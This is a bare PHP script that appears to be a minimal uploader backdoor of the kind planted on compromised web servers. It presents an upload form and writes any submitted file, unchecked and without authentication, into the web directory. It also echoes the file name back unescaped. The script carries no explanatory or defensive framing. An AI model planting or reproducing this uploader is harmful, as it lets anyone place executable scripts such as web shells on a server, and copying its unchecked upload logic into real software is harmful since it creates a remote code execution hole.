 <?php
if(isset($_POST['Submit']))
{
   $filedir = ""; 
   $maxfile = '2000000';
   $userfile_name = $_FILES['file']['name'];
   $userfile_tmp = $_FILES['file']['tmp_name'];
   if (isset($_FILES['file']['name'])) 
   {
     $abod = $filedir.$userfile_name;
     @move_uploaded_file($userfile_tmp, $abod);
     echo"<center><b>Done ==> $userfile_name</b></center>";
   }
}
else
{
   echo'<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="file"><input type="Submit" name="Submit" value="Submit"></form>';
}
?> 
